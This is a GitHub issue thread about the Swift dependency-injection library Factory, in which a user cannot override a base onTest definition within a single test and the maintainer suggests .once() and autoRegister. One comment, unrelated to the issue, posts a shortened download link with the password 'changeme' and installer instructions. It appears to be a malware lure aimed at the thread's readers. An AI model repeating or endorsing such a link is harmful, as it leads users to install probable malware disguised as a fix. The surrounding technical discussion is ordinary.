### ISSUE TITLE
Unable to override onTest context in specific test

### ISSUE THREAD

**Issue by GeekOnIce** [hmlongco/Factory#222]
I have a bit of an esoteric use case for test overrides. There's a dependency that is injected indirectly across several tests, and for that a single `onTest` definition in the base extension is working really well. However, I recently found that on a new test I was writing, I needed to get some slightly different functionality that only apply to this test, so thought I'd simply override `onTest` in this single test case and it'd work. Unfortunately, I've so far been unable to make that test use the updated version of the dependency - it just gets the version from the base definition instead and seemingly ignores the override from that test case.

Not sure if I'm missing something that allows the overwrite to work in this case, or if this is a bug or piece of missing functionality that I just happen to be hitting. I'm currently using the latest version, `2.3.2`, in an app targeting `16.0` using Xcode `15.4`, and a minimal repro is below.

```Swift
open class Foo {
    func name() -> String { "Foo" }
}
class FooTest: Foo {
    override func name() -> String { "FooTest" }
}
class FooBar: Foo {
    override func name() -> String { "FooBar" }
}

extension Container {
    var foo: Factory<Foo> {
        self { Foo() }
            .onTest {
                FooTest()
            }
    }
}

final class FooBarTest: XCTestCase {
    func testBaseFoo() {
        let foo = resolve(\.foo)
        XCTAssertEqual("FooTest", foo.name()) // this passes as expected
    }

    func testFooReplacement() {
        let fooBar = FooBar()
        Container.shared.foo.onTest { fooBar }

        let bar = resolve(\.foo)
        XCTAssertEqual("FooBar", bar.name()) // this fails, it gets "FooTest" instead
    }
}
```

I've tried doing it with the `context(.test)` instead, doing both `register` as well as `onTest`, resetting, etc. and so far the only thing I've been able to do is to remove `onTest` on the base definition, but that ends up breaking those other tests. I can think of some refactoring that I could do here, but that'd be a bit of a pain to do and seems like I should be able to override that definition here and avoid that.

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by hmlongco** [comment]
Read the documentation on [.once()](https://hmlongco.github.io/Factory/documentation/factory/modifiers#Once).

As mentioned, once is a useful tool to have around, but in reality it’s probably best simply to be careful in regard to what goes into our basic Factory definition.

Contexts, in particular, should probably be defined in the Container’s autoRegister function if you're going to want to override them with other values in the future.

**Comment by GeekOnIce** [comment]
> Contexts, in particular, should probably be defined in the Container’s autoRegister function if you're going to want to override them with other values in the future.

Unfortunately `autoRegister` doesn't work well for this setup - there's 30+ swift packages that are contributing into the Container, but only one `autoRegister` function can exist in the final application. It's already used in one of the lower level components for a specific reason (also test related), which means it's not available for any other package.

`once` does look promising though and works in the minimal repro. It's not working in the full project, but I think it _should_ be from how I understand it now, so am currently working back from there to figure it out. Thanks for the help!

**Comment by hmlongco** [comment]
onTest and the other contexts are convenience helpers, designed for situations where you're going to want one and only one common instance (like an analytics stub).
